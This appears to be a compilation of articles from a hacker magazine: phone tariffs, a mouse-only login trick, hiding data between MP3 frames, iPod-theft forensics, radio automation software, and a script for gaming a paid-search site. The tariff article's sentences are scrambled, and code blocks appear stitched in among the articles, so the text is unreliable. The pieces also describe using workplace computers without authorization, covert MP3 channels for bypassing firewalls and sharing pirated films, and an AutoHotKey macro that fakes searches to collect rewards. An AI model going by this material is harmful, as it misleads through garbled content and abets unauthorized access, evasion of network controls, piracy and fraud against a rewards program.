• http://tariffs.htm . I recently disconnected the final remaining party line in my wire center. For the curious phreak. busy Central Offices still do a brisk business in them. which was last revised in 1971. but they don’t have to offer you the maximum (and usually won’t as a starting point for negotiations). has an entire section of their tariff library in each state dedicated to obsolete tariffs detailing the rates and terms of services that are no longer offered.in almost any usage pattern less expensive than a foreign exchange circuit.com/ Pay site that tracks tariffs across substantially all telecommunications providers • http://www. all of which are . if you read the tariff. For example. which can help you avoid intraLATA toll charges in limited circumstances.com:8000/ ➥Q_Tariffs/index. When a new Central Office is constructed (an incredibly rare event these days. The business office will sell these services to you. Qwest. And that’s all they can offer. These services set up a “ghost number” in the remote office. Most people needing this capability order a foreign exchange circuit. as little as 25 years ago).or.puc. and I’m not allowed to use subscriber information to suggest products or services without the subscriber’s explicit consent. Other tariffs provide geographical exceptions. all of these offers have to be filed with the Public Utility Commission. but not uncommon in the rapidly growing western U. and rarely used service called “Market Expansion Line” for business lines.completely unnecessary. Only the services described in the tariff can be offered at the prices they are advertised. and the applicable Universal Service Order Code (USOC) can help you save money (sometimes a lot of money) on features. Alternatively. obscure. you could order a cheap. in Washington. Unfortunately. but are still maintained for existing subscribers.state.S. there still exist tariffs for them in many states that grandfather existing users.gov/ .THE HACKER DIGEST . 
And with that.tariffnet. Nonetheless. Accordingly. which belonged to a subscriber who was 92 years old and had maintained the same service since 1946. in fact. Finally. her rate was grandfathered in under the old tariff. otherwise they’ll sell you a foreign exchange circuit. browsing tariffs is a good way to learn exactly how much you can squeeze out of your phone company in promotions or retention offers. The only thing you give up is a dial tone from the distant Central Office. For instance. Of course. the serving boundaries are strictly defined by tariff. However. The bill can easily run to over $100 per month or more. Qwest can offer you a promotional credit in a value equal to three months of the service to which you’re subscribed.com/ ➥tariffs/ . And considering the subscriber has to contact me before I can request that consent.cfm .verizon. browsing tariffs can result in some fairly interesting discoveries. despite party lines having been obsolete for decades.us/ Oregon PUC • http://www. or heavy fines can result.Washington Utilities and Transportation Commission
References
. either to win a new subscription or to stave off a cancellation.com/ser ➥vicelibrary/consumer/ext/ ➥index.Qwest tariff library • http://serviceguide. their brand name. there is more than one way to skin a cat. you’d settle for nothing less than the maximum. with permanent call forwarding to your regular number. One local plumbing company has over a half-dozen foreign exchange circuits. which bills a hefty setup fee and an even heftier monthly fee (including a mileage charge). understanding which services are in the catalog. On a more practical level. people living in the area with existing telephone service have to be explicitly allowed to maintain service from their existing wire center. and there’s more than one way to have a phone number in a different wire center ring your line in my Central Office.Verizon tariff library • http://tariffs. I can’t advise them that they’re wasting money because the tariff strictly regulates subscriber privacy. And remember that if you wrap your car around a telephone pole despite it all.in my estimation . the other party on her line moved away in the early 1980s after party line service was discontinued for new subscribers. even though foreign exchange circuits almost never make financial sense. I’ll probably retire before I can save these folks a dime. and precisely according to the rates and conditions outlined in the tariff. In effect.net/hawaiiantel/ Hawaiian Telecom tariff library • http://www.qwest. she didn’t really have a two-party line anymore. Deviations are not permitted in any way.

I opened up a browser and pasted that ‘g’ into the address bar. though. I hadn’t given up yet. I found it was disabled. It is surprising what articles you can get to from a seemingly random article. I had navigated to a character map that contained all of the characters I needed. and then become more specific. instead of throwing our hands up in defeat and going on to do something normal.com
This article is not really an example of an exploit. It is tons of fun. I would wait for all of the normal employees to leave and just use whatever computer was left unlocked to browse the interwebs. The object of the game is to use only the links within the random article to navigate to the target article (Linux).’ I was then looking at a description of Notepad. From Science. For example: somehow get to ‘Science’ from the random article. I was then determined that if I could enter text with an NES controller. I especially needed to log into a profile for my physics class. this is the type of story that warrants the “you have too much time on your hands” response.
Wikipedia Game Appendix
. The best strategy is to work your way to a general article. fewest number of links to the target. I grabbed the ‘com’ from the word ‘common’ and pasted that at the end. 2. to know what homework I had to do that night. but how would I do that without a keyboard? I still had a working mouse. I clicked the ‘go’ button in my browser and arrived at Google.’ I copied and pasted that word into the Google search and clicked on the Wikipedia article for Unicode. This made me think back to older video game systems with very few buttons on the controller. I rightclicked on the highlighted ‘g’ and copied it. Rather.com. Finally. but many users find Notepad a simple tool for creating Web pages. I went back and copied the ‘oo’ from the word ‘tool’ and pasted the ‘oo’ after the ‘g’ in the address bar. 3. The most common use for Notepad is to view or edit text (.’ Next I copied the ‘le’ from the word ‘simple’ and pasted it at the end of my growing ‘goog’ string.
The idea of the game is to choose a ‘target article’ (say Linux) and then use Wikipedia’s ‘random article’ feature as a starting point.’ from that ‘(. The challenge came one night when the only computer left unlocked didn’t have a working keyboard.VOLUME 26
by XlogicX drkhypnos314@hotmail. or a combination of both. Usually. there were at least three or four computers around the building that were left unlocked. It all started several years ago when I was contracted to work the graveyard shift in a building with many computers. though.THE HACKER DIGEST . So. Obviously. Though there were few buttons. sick of hearing that phrase. Try the game out at your next 2600 meeting.” I had everything I could possibly want. as we all surely are. I played the ‘Wikipedia Game’ (see appendix) to get to the article about ASCII. it is a story on a hacker’s approach to an unlikely challenge. I could do it with a mouse. Towards the end of the help document for Notepad (third paragraph). the first thing I looked for was the character map. Yes. I was able to use this ASCII table to slowly copy and paste my way into the login page for my physics classwork. 5. Opened Notepad. I had arrived at my needed setup. This was the first paragraph: “Notepad is a basic text editor that you can use to create simple documents. it appeared to be a call center. Here is what I did with the XP machine I was at: 1. I highlighted the letter ‘g’ from the word ‘creating’ in the above paragraph. Most nights. But I am. leaving me with ‘google. be it playing a game or entering the name of your character in an RPG. At least we find something creative and different to do with our time.’ 4. Next. you could do so much with them. Went to ‘Help’ -> ‘Help Topics. Linux is cake: something like Science -> Computer Science -> Computer -> Operating System -> Linux. You can play for speed. This article contained a dumbed down ASCII table with most of the printed ASCII characters.txt)’ part of the paragraph. Since I was a contractor. I came across the word ‘unicode. All players should start with the same initial random article. Unfortunately. I didn’t have legitimate access to any of these computers. I copied the ‘g’ I already had in the address bar and pasted it after the
‘oo. I then grabbed the ‘.txt) files.

com) A 757 Labs Effort (www. one can leverage the properties of this format to transmit data that is not heard but can still be extracted. This is merely insurance for protecting the aural pleasure of the listener. This means that. and compare the frame count. Therefore.757labs.
. the audio player looks for that special pattern signifying the
start of an audio block. a series of 11 set bits. As a side note.of-band data has the same signature of an MP3 frame header. The audio player then grabs that calculated amount of data and processes it appropriately. the length of the audio data trailing that frame can be determined. If someone is actively looking for such out-of-band data. Each frame consists of a header and appended audio data. is called the “sync frame. any data that exists between frames should not be replayed. Likewise. anything outside of the frame is ignored. Just looking at the number of podcasts floating around. This pattern. The MP3 format has been a relative commonality for streaming media as its underlying structure nicely supports such means of data transfer. and the result can be a rather despicable symphony of squeaks and squawks. This article discusses hiding and transmitting information within an MP3 file that can be later streamed or downloaded. the ability to disseminate information has become relatively common. 3]. or stream. Since each audio frame has a header with a special signature. 7]. or why partially downloaded MP3 files can still be played. someone might analyze the audio file. if the audio player tries to play all data. the length of the audio data can also be determined [1]. Once a frame header is obtained. and ID3 information tags to the actual file size.VOLUME 26
MP3 Data Stream as a Covert Means of Distributing Information
by enferex (mattdavis9@gmail. hiding information between frames is a quick and easy means to stash away data. one can see the variety of information being spread. such as bit and sampling rates. On the other hand.
3 Hiding Information Since audio players are only concerned with replaying audio data. furthering the expansion of musical interests and introducing new ideas to the masses.” and each frame in the data stream contains it. the audio data is encoded and decoded via the Huffman encoding scheme [2. four bytes. Whether through internet radio or downloadable tracks. if an audio player is implemented correctly. provides information. For instance. An MP3 can be made up of thousands of these frames. frame sizes.com) 1 Introduction One of the great things about the collective brain of the internet is the amount of information that can be exchanged as events occur in the tangible world.THE HACKER DIGEST . By applying proper mathematical calculations to the data in the frame’s header. it is easy to find. or if the out. some rather obnoxious sounds might emerge. This header allows an audio player to appropriately reproduce the correct sounds. Likewise. 2 Frames An MP3 file is nothing more than a series of frames. chances are that there is some extra data hiding underneath the covers. new music and other audio tracks can be consumed. which describes the audio data that follows. While not truly a form of audio steganography. which is the primary reason why streaming MP3 audio works. However. If the sizes do not correlate properly. Any data outside of the frame can be ignored. true forms of audio steganography rely on actually hiding information in the audio bits themselves [6. This small header. information can be hidden by placing it between audio frames. Thinking such out-of-band data is something that can be heard is a gross assumption.

2001. 17 January 2008. 2001. which increases the original file size. What would happen if one were intentionally hiding information between frame headers. the seven-bit encoded data produced can be compressed. “Aww man. lots of large pauses. it must be that chick Roxanne sending me emails about how I can improve my performance. this is great! Ohh wait.Wikipedia. the main focus of development shifted from data detection to actual data hiding and recovery. However. 6 August 2008. assume one were distributing this perfectly legit movie using a perfectly non-legit audio file. a sync frame would never appear. 19 July 2008.g. Such an encoding scheme should never produce a stream of 11 bits all set. For instance.Frame Header. Accesed on 15 August 2008.ital Storage Media at up to about 1. Such cases can be avoided if the data never contains any pattern that looks like a MP3 sync frame. In fact. could be to bypass firewalls that prevent access to outside email (e. audio players look for a signature that prefixes and describes a following block of data. for some reason. Sting again. In other words. it is simple to do. Certain portions of the remaining 21 bits of the header can be used to validate that the frame and following data is audio. http://www. ➥com/en/wiki/MP3 [4] ASCII. http:// ➥en. However. [6] Fabian Petitcolas. MP3’ Tech . the stars all align properly and the hidden data just happens to look like a valid MP3 header. However. for example a completely legit HD-quality video. Plain ole’ ASCII text is a perfect example of such an encoding. http://en. bit rate/ sample rate values). a 4GB movie would take quite a while to distribute.g. MP3’ Tech. Such a signature begins with the first eleven bits all set. Such a method allows for data to be quickly extracted as the media is being played/ streamed. Coding of Moving Pictures and Associated Audio for Dig. and now this tool can covertly pack data into a series of MP3s for distribution. rather than in the audio itself. 
for humor. that block of data might be played as audio. both static and streamed. they probably would not want to stuff it all into a three-minute/3MB audio file. if the audio tool did not do the proper calculations on data in the header (e.Accessed on 27 July 2008. So it is of importance that anyone trying to stuff data between frames not replicate such a signature.org/hacks/mpeg➥drafts/11172-3. Even cooler would be to associate email-senders to a particular musical artist and stream that data.” References [1] Bouvigne. if one can avoid passing an entire byte with all bits set.petitcolas.” In fact. It is not a compression technique. as it only uses seven bits of data to encode characters [4].
5 Conclusion While the method of hiding data between frames. 22 Novermber. Accessed on 15 August 2008. especially if it were encoded using uuencode. if someone desired to covertly distribute a movie. The uuencode tool helps with this trick. One potential use for this technology.org/programmer/frame_ ➥header. After some time. we needed to inject data between frames so that we could verify that the tool was working properly. It should be mentioned that seven-bit encoding of raw data will result in a file larger than the original. “Wow this song is really boring. ➥ mp3-tech. mp3stego. Not to mention that the three minute song would be of a curious size. ➥ net/fabien/steganography/mp3stego/ [7] Mark Noto MP3Stego: Hiding Text in MP3 Files SANS Institute. and a segment of that to-be-hidden data contained the same bit-signature as a frame header? Well. sync bits and all. transforming standard binary machine encoding into seven bit ASCII encoding[5]. is less a testament to steganography. 25 July 2008. Such a case might also occur if.wikipedia. One simple solution is to encode the data beforehand in a manner that will not mimic a sync frame. chances are that the data is out-of-band. The original intent of this application was to analyze MP3s.html [2] MPEG. however outlandish it might appear. Wikipedia. Wikipedia. if a particular bit sequence is defined that does not equate to a valid bit rate or sample rate.VOLUME 26
As previously mentioned.
4 Tool: mp3nema The mp3nema tool has been produced to aid in stuffing and extracting data between frames. testing such analysis required that a valid test case be created to assure detection. http://www.
. 1991.wikipedia. streaming of uuencoded email in tracks of music).
[3] MP3. Gabriel. Accessed from
http://le-hacker.com/en/wiki/ASCII [5] Uuencoding.5 MBIT/s Part 3 Audio (Draft). for out-of-band data.
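The frame walk and size comparison the article describes (count the frames, add up their lengths, and treat every byte a player would skip as out-of-band data), as an added example that is neither the article's nor mp3nema's code. It assumes MPEG-1 Layer III headers only and uses a constructed five-frame stream with 11 bytes stashed between frames; has_sync_pattern shows why seven-bit encodings such as ASCII or uuencode output can never collide with the 11-bit sync pattern.

```python
# Added example (not the article's or mp3nema's code). Assumptions: MPEG-1
# Layer III only; ID3 tags simply show up as a leading or trailing gap.

# kbps table for MPEG-1 Layer III; index 0 ("free") and 15 are treated as invalid
BITRATES_V1_L3 = [0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320]
SAMPLE_RATES_V1 = [44100, 48000, 32000]   # index 3 is reserved


def frame_length(hdr):
    """Frame length in bytes for a valid MPEG-1 Layer III header, else None.

    Header layout: 11 sync bits, 2 version bits, 2 layer bits, 1 protection bit,
    4 bitrate bits, 2 sample-rate bits, 1 padding bit, then mode/misc bits.
    The bitrate/sample-rate checks are the "remaining bits validate the frame"
    test the article mentions.
    """
    if len(hdr) < 4:
        return None
    b0, b1, b2 = hdr[0], hdr[1], hdr[2]
    if b0 != 0xFF or (b1 & 0xE0) != 0xE0:            # first 11 bits set
        return None
    if ((b1 >> 3) & 0x3) != 3 or ((b1 >> 1) & 0x3) != 1:   # MPEG-1, Layer III
        return None
    bitrate_idx = (b2 >> 4) & 0xF
    sr_idx = (b2 >> 2) & 0x3
    padding = (b2 >> 1) & 0x1
    if bitrate_idx in (0, 15) or sr_idx == 3:
        return None
    return 144 * BITRATES_V1_L3[bitrate_idx] * 1000 // SAMPLE_RATES_V1[sr_idx] + padding


def scan_stream(data):
    """Walk the stream and return (frame_count, audio_bytes, gaps).

    gaps lists (offset, length) for every run of bytes a correct player skips,
    i.e. anything that is not a complete, valid frame. A clean file has
    audio_bytes == len(data) and no gaps apart from its ID3 tags.
    """
    pos, frames, audio_bytes, gaps = 0, 0, 0, []
    n = len(data)
    while pos < n:
        flen = frame_length(data[pos:pos + 4])
        if flen is not None and pos + flen <= n:
            frames += 1
            audio_bytes += flen
            pos += flen
            continue
        # Not at a valid frame: slide forward byte by byte to the next valid
        # header and record everything in between as out-of-band data.
        start = pos
        pos += 1
        while pos < n:
            flen = frame_length(data[pos:pos + 4])
            if flen is not None and pos + flen <= n:
                break
            pos += 1
        gaps.append((start, pos - start))
    return frames, audio_bytes, gaps


def has_sync_pattern(payload):
    """True if payload contains 11 consecutive set bits (a possible false sync).

    Seven-bit encodings never do: the high bit of every byte is clear, so a run
    of set bits can never exceed seven.
    """
    run = 0
    for byte in payload:
        for shift in range(7, -1, -1):
            if (byte >> shift) & 1:
                run += 1
                if run >= 11:
                    return True
            else:
                run = 0
    return False


# Constructed sample: 128 kbps, 44.1 kHz, no padding -> 144*128000//44100 = 417 bytes
FRAME = bytes([0xFF, 0xFB, 0x90, 0x00]) + b"\x00" * 413
SAMPLE_STREAM = FRAME * 3 + b"hidden text" + FRAME * 2   # 11 bytes between frames


def report(data):
    """The article's size check: do the frames account for the whole file?"""
    frames, audio_bytes, gaps = scan_stream(data)
    return {"frames": frames, "audio_bytes": audio_bytes, "file_bytes": len(data),
            "unaccounted": len(data) - audio_bytes, "gaps": gaps}


if __name__ == "__main__":
    print(report(SAMPLE_STREAM))
```

A gap whose bytes happen to form a valid header with a plausible length is the collision case the article warns about; this walker would then count it as a frame, which is exactly why the hidden data should be seven-bit encoded.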

The cleaning staff came through at 6 pm and was usually done by 8 pm. Here is what I found that works under XP Pro SP2. not removed. I realized that I had left my iPod sitting on my desk plugged into my Mac. If anyone was there then they would have looked awfully suspicious. significant happenings with block devices. Damn. Windows is the dominant OS and is likely to remain that way for a while. The logging on Windows isn’t that great. There were a few guys that might have found it funny to alarm me (and probably owed me for messing with them in the past). Since I knew what time it happened and since it was at night. especially in a noisy office. he lost his job. and the iPod was subsequently removed.THE HACKER DIGEST . The time at which an iPod was unplugged cannot be determined if the user was logged in. She explained that it was a member of the cleaning staff that had come back after his shift to steal electronics. and the iPod was removed. and the iPod was subsequently removed. There is a girl that sits a few feet away from me in her cubicle and talks to herself all day.-) It wasn’t the first time an iPod had been stolen at my office. I am usually very careful to protect my iPod. logged out. The following morning when I arrived at work. given that my workplace is relatively safe. her constant chatter is maddening. and it wasn’t the last either. I gave her a call to ensure that the key card access logs got reviewed and that the security camera recordings were preserved. the manager of the physical security group stopped by and returned my iPod unharmed. The things are like little stacks of cash laying around waiting to be taken. Because of this. About half
an hour later they called to tell me that they know who did it and would handle them later that day when they were scheduled to work. I found a way to get the same results on Windows XP. there are honestly days when I could quite possibly lose it. Then it struck me that I had a critical piece of information sitting in my lap that just might get the iPod back in my hands. .) But alas. When did I leave the office? Who was still working as I was leaving? Maybe it was just a prank. given the right circumstances.VOLUME 26
(or catching an iPod thief using forensic analysis)
Sep 10 22:31:23 computer kernel[0]: disk2s1: media is not present.
Don't Steal Music!
So I called up the physical security folks and let them know that there was a theft.)
by frameloss
Music is important. I was half way through my first cup of coffee before I realized that my music player was gone! Of course. Unix users have it easy. Of course. since I always misplace things. it is configurable. such as hard drives. Key card logs and corporate video surveillance may have been useful for the first time known to man. but does not work on Vista. It also seems to work on SP3. • User was logged in. Without my headphones. and the system was subsequently rebooted because the “HKLM\ SYSTEM\CurrentControlSet\Control\DeviceClasses” registry tree appears to be dynamically
. However. However. I assumed that it would be pretty easy to figure out who did it. the /var/log/system. As if it wasn’t bad enough to be stuffed into a cubicle. • User was logged in. but it somehow never seems to have the right settings to make this type of work easy. I work in IT security. of course. Sweet. The next morning. So there should have been no one in the office around the time my iPod grew legs. you can already guess what happened next. For this reason. where you can only get the last time an iPod was synced. the time at which an iPod was last plugged in and the time at which it was unplugged can be determined in the following cases: • User was logged in. I asked around. I spent the next half hour tearing my cube apart looking for my iPod. but everyone I spoke to denied taking my iPod. logged out. The system was not shut down. I decided to do a bit more research and find out what it would take to get the same forensic results from a Windows machine.

and you should be able to see when the registry key was last written. • -i:reg instructs logparser to use the system registry as the source. This allows for easier analysis with a spreadsheet program. and it is important to see the errors in case you are not seeing all of the necessary data.
Opening the CSV file in your choice of spreadsheet program will allow you to sort the data by access time. I hope you are as lucky as I was and get your iPod back. and Services) which is why the query is performed at such a high level within the registry.THE HACKER DIGEST . It looks at all values in the registry. So. • -o:csv specifies that the output should in comma separated value format. • -e:1000 instructs logparser to quit after 1000 errors (a number intentionally higher than is likely to happen in such a restricted query). with SCSISTOR for SCSI) have been connected and experiment with the name assigned by the device manufacturer to find the evidence you need. substitute an appropriate value for <hostname> listed above.csv
You should. such as a USB thumb drive. surrounding the string “iPod”. This is when the device was unplugged. • > outfile.VOLUME 26
rebuilt at boot time. This is done using the logparser tool from Microsoft. Be sure to encapsulate whatever string you need with single-quotes and percent signs as shown in the above example. Next you can perform the log query:
logparser -i:reg -o:csv “select ➥ * from \\<hostname>\HKLM\SYSTEM\ ➥ CurrentControlSet\ where path ➥ like ‘%iPod%’ order by lastwritetime ➥ desc” -e:1000 > outfile. you can tell when a device was removed. Sort by descending timestamp.csv specifies the file name where information will be stored. You can view the HKeyLocalMachine\SYSTEM\CurrentControlSet\Enum\USBSTOR\ area of the registry to see what other removable USB devices (or substitute USBSTOR. ENUM. as long as the system was not shut down. • The string ‘%iPod%’ can be changed to represent another device. If you plan on doing the procedure remotely (which will result in less overall changes to the system when compared to logging in as a user interactively). you will need to perform the following command from a CMD. too!
Available at booksellers worldwide including http://amazon. then errors will not appear in the output. It then returns it sorted in a list with the most recent entries first.
Command options explained
• HKLM is shorthand for HKeyLocal ➥Machine. • To see what other fields can be queried you can run logparser -i:reg -h • There are three subkeys below CurrentControlSet that contain relevant information (Control. once again.com/2600 23
. where the pathname (not actual key values) has the text iPod.exe shell on another host before beginning:
net use \\<hostname>\ ➥ ipc$ /u:<administrator>
Substitute appropriate values for the <hostname> of your machine and the <administrator> account name. Also any line breaks should be removed when running the actual command. If logparser is not given this instruction. • select * from \\<hostname>\HKLM\ SYSTEM\CurrentControlSet where path like ‘%iPod%’ order by lastwritetime desc is the actual query.
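To turn the two kinds of evidence above into a single incident timeline, here is an added Python example; it is not frameloss's code. It parses syslog lines in the layout shown earlier and the CSV that the logparser registry query writes, then merges both into one newest-first list. The inputs embedded in it are constructed: the hostname, registry paths, device identifiers and timestamps are made up.

```python
"""Incident timeline from device-removal evidence (added example).

Not frameloss's code. It takes the two kinds of evidence the article relies
on, lines from a Mac's /var/log/system.log and the CSV written by the
article's logparser registry query, and merges them into one newest-first
timeline. The sample inputs are constructed; hostname, registry paths,
device identifiers and timestamps are made up.
"""
import csv
import io
import re
from datetime import datetime

# Constructed syslog excerpt in the BSD syslog layout the article shows
# (month day time host process[pid]: message; there is no year on the line).
SYSLOG_SAMPLE = """\
Sep 10 18:02:11 computer kernel[0]: USBMSC Identifier (non-unique): 000A27001A2B3C4D 0x5ac 0x1261 0x1
Sep 10 22:31:23 computer kernel[0]: disk2s1: media is not present.
Sep 10 22:31:23 computer kernel[0]: disk2s1: media is not present.
Sep 10 22:31:24 computer kernel[0]: disk2s1: media is not present.
Sep 11 08:15:40 computer loginwindow[54]: Login Window Application Started
"""

# Constructed CSV in the layout logparser -i:reg -o:csv writes (columns of the
# REG input format: Path, KeyName, ValueName, ValueType, Value, LastWriteTime).
# A SanDisk row is included so the iPod filter has something to exclude.
LOGPARSER_SAMPLE = """\
Path,KeyName,ValueName,ValueType,Value,LastWriteTime
HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\\##?#USBSTOR#Disk&Ven_Apple&Prod_iPod&Rev_1.62#000A27001A2B3C4D&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},##?#USBSTOR#Disk&Ven_Apple&Prod_iPod&Rev_1.62#000A27001A2B3C4D&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},DeviceInstance,REG_SZ,USBSTOR\\Disk&Ven_Apple&Prod_iPod&Rev_1.62\\000A27001A2B3C4D&0,2008-09-10 22:31:25
HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\\Disk&Ven_Apple&Prod_iPod&Rev_1.62\\000A27001A2B3C4D&0,000A27001A2B3C4D&0,FriendlyName,REG_SZ,Apple iPod USB Device,2008-09-08 17:44:01
HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\\Disk&Ven_SanDisk&Prod_Cruzer&Rev_8.02\\1234567890&0,1234567890&0,FriendlyName,REG_SZ,SanDisk Cruzer USB Device,2008-09-09 12:03:55
"""

SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<proc>[^\[ ]+)\[\d+\]: (?P<msg>.*)$"
)
# The kernel repeats this line for a while after a mounted volume vanishes, so
# the first occurrence per device is the best estimate of the unplug time.
# Caveat: a clean eject produces the same message; it proves the volume went
# away, not that someone pulled the cable.
MEDIA_GONE_RE = re.compile(r"^(?P<dev>disk\d+(?:s\d+)?): media is not present\.?$")


def syslog_unplug_events(text, year):
    """Return [(datetime, device)] for the first 'media is not present' line per device.

    syslog lines carry no year, so the caller supplies it.
    """
    first_seen = {}
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        g = MEDIA_GONE_RE.match(m["msg"])
        if not g:
            continue
        when = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        dev = g["dev"]
        if dev not in first_seen or when < first_seen[dev]:
            first_seen[dev] = when
    return sorted((when, dev) for dev, when in first_seen.items())


def registry_hits(csv_text, needle="iPod"):
    """Rows whose Path contains `needle` (case-insensitive), newest LastWriteTime first.

    This is the article's WHERE path LIKE '%iPod%' ORDER BY lastwritetime DESC,
    applied here so the filter can change without re-running logparser.
    """
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if needle.lower() in row["Path"].lower():
            when = datetime.strptime(row["LastWriteTime"], "%Y-%m-%d %H:%M:%S")
            hits.append((when, row["Path"], row["ValueName"]))
    hits.sort(reverse=True)
    return hits


def build_timeline(syslog_text, csv_text, year, needle="iPod"):
    """Merge both sources into one newest-first list of (datetime, source, detail)."""
    events = [(when, "mac-syslog", f"{dev}: media is not present")
              for when, dev in syslog_unplug_events(syslog_text, year)]
    for when, path, value in registry_hits(csv_text, needle):
        leaf = path.rsplit("\\", 1)[-1]
        events.append((when, "win-registry", f"{value} under ...\\{leaf[:48]} last written"))
    events.sort(reverse=True)
    return events


if __name__ == "__main__":
    for when, source, detail in build_timeline(SYSLOG_SAMPLE, LOGPARSER_SAMPLE, 2008):
        print(f"{when:%Y-%m-%d %H:%M:%S}  {source:<12}  {detail}")
```

The registry side deliberately re-applies the LIKE filter in Python: run the logparser query once against the whole CurrentControlSet tree and keep the CSV as evidence, then try "iPod", "Cruzer" or whatever the manufacturer called the device without touching the suspect machine again.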

by hypo

If you're listening to a radio right now, there's a good chance you're listening to a computer's sound card pushing out audio from an automated program we in the business like to call "automation." Since the late 90s, automation systems have been put in all over the country to offer a cost-effective way to provide programming to the audience. Before we get into the guts of the actual system, let's first look into why Google would want to acquire radio automation software.

History

Dave Scott, designer and owner of Texas-based Scott Studios, developed the SS32, an automation system that became widely used around the country. In the early 00s, Scott Studios was purchased by dMarc Broadcasting of California. Shortly after, dMarc released software called the "dMarc Agent," which would provide real-time diagnostics and information from local stations to a central server. Some of the local information was the title and artist of the song being played on the air. Stations would then use this information and display it on their web site. Shortly after the acquisition, dMarc released a version of the "Agent" that also allowed local stations to send their traffic logs, which include items like commercials and public service announcements, to the California server. If there were any holes in the traffic log (filled by nonpaying items like PSAs), dMarc would send down audio and schedule it into the local station's paid national advertising spots. This was a win for dMarc, who made money on the ad's sale, as well as for the local station, who made money for playing the ad. Is any of this starting to sound familiar? The inevitable acquisition of dMarc was soon made by Google. Google now calls this program "Audio Ads", a close cousin to its hugely popular AdSense web-based ad placement system.

The Basics

A basic installation of an SS32 system at a local station relies on having 4 computers:
• A server-like system called "Dispatch"
• A system that pre-records jock breaks called "Voice Tracker" or "VT"
• Any computer that sends pre-recorded material like songs, spots, etc. (normally called "Production" or "prod")
• And last, but not least, the on-air "SS32" computer.
All of these computers are hooked into a network. Some smarter stations create a separate LAN that all of the computers on the audio network are hooked into. Some other office computers, which can run music scheduling software and the "Audio Ads" program as a proxy, have two NICs, one for the audio network and the other to the Internet. In some installations, all of the computers are connected to the Internet. This may be one of the biggest mistakes a station can make.

Audio gets ripped into the system by a program called Trim Label & Convert (TLC). The audio can either be in an .mp2 or .wav file format, both of which are proprietary to Scott Studios/dMarc/Google. TLC converts the file format, places metadata, and assigns a user-managed cart number into the system. After TLC does its thing, it sends the audio to Dispatch, which makes a copy of the audio on its local hard drive, then copies the audio to the SS32. Now there are as many as three copies of the audio on the network. All of the audio ultimately gets sent to the SS32 box via the Dispatch server. This can come in very handy when the SS32 has some type of catastrophic failure. We all know that can never happen, right? When the SS32 does get hosed, the audio can get fed to a backup SS32 machine. The backup can run the audio through the network via Dispatch. Although this is not recommended on a long-term basis, it is good enough to get another "Green Machine" sent to you from Google.

The SS32 offers solid 24/7 performance at a fairly reasonable price. The support that Google offers is amazing. The people who pick up the phone are, for the most part, former users of the SS32 system, in a support center in Texas. During the day there are many techs on call, while at night there is at least one tech on call, who will call you back in as little as 20 minutes. These folks will stay on the line with you until the problem is fixed. Calls of more than 3 hours have been logged by yours truly. This makes the experience on a local level so much easier.

Please note that Google is now offering a new version (6) of the system which may or may not have the components in the network described above. If requests to get more in-depth information on Google Radio come in, I will be more than willing to offer it up. Please keep listening to terrestrial radio.

References

Google Automation Home is here: http://www.google.com/radioautomation/index.html
Is your favorite station running "The Agent"? Go to: http://stations.dmarc.net/Console/NextPlays.aspx?c=WXYZ-FM&tz=EST&n=1&a=TAS
Replace WXYZ with your favorite station and replace "FM" with "AM" if need be. You can also plug in your time zone (tz). If you want to display any combination of the time (T), artist (A), or song title (S), modify the "&a=" argument.
And Google's "Green Machine" is here: http://www.google.com/radioautomation/productshardware.html

Scour: Paid to Search. Again?
by D4vedw1n

This article started out as my attempt to try to beat a system through the use of various tools. In the process, I learned a lot. It offered me a chance to learn something new (scripting), and most importantly I got the job done (thanks Chad). I am still new to the scene, and am still learning as I write, so this may seem basic to some readers. I saw this as my opportunity to make a small contribution to my newly found 2600/hacker world, and I learned enough that I felt compelled to write this.

In late June, a new web site called Scour launched, and with it the promise of getting paid to search and comment. We've heard this before, in the late 90s with ad sponsored, free service providers. I remain skeptical, until I get mine. There are people on the site that claim to have gotten their gift cards, though.

The first thing I would like to say is that you will not (to my knowledge) be able to "earn" the $25 in one day. You get 100 points for downloading their toolbar, and there is a "500-point personal cap" on search points per day. There is, however, an unlimited number of referral points, like an MLM scheme, though I haven't checked to see if you get points for your friends' friends' friends. They caught on pretty quickly to tricks. If you get caught and kicked off the site, sorry Charlie.

You are going to need three things: a text editor, the Scour toolbar, and a macro type tool. First, go to http://www.scour.com and set up your account. Once your account is set up, do a few test searches to be sure your points are accumulating. Second, you will need a tool that allows you to run macro type functions on your PC. I tested this with a demo of "Workspace Macro 4.6", but I quickly ran out of uses. A friend mentioned a cool tool he uses daily, "AutoHotKey," which is available at http://www.autohotkey.com. I used this because it was free, and the software downloaded and installed easily. I downloaded the user manual as well. I found it most effective. Third, the text editor I used was Notepad, for simplicity. I downloaded a book for length from www.etext.org. This generates the "random" searches.

After installing AutoHotKey (AHK), you will need to find the location of your Scour toolbar. Launch AHK (it will show up in the system tray as a white "H" in a green square). Right-click on the AHK icon in the system tray and select Window Spy. Then click in the toolbar for Scour. Make a note of your "In Active Window: X, X" coordinates for the script. This way, if your browser likes to move around (like IE), the toolbar will always be at the same location. Start a new AHK script by right-clicking and then choosing "New > AutoHotKey Script" from the menu. Name it, keeping the AHK extension. Right-click that file and choose edit. Leave the template in there and enter the script. Below are the nuts and bolts of the script. You will want to change the document title from "Untitled - Notepad" to the document you are using (found in the title bar), and the browser you are using (I was using IE 6). Open Notepad, or your e-text document, and set up the script so that it matches your setup. Then run your edited script:

SetTitleMatchMode, 2 ; helps with the WinWait command below
Loop 3
{
; Set focus to the document
WinActivate, Untitled - Notepad ; Replace with the name of your document
; Highlight the text (three words)
Send ^+{right}^+{right}^+{right}
; Clear the clipboard and copy the text for the search to the clipboard
clipboard =
Send ^c
ClipWait
; Move off the highlighted text. If using Word or OpenOffice, left and right
; act funny, so use right.
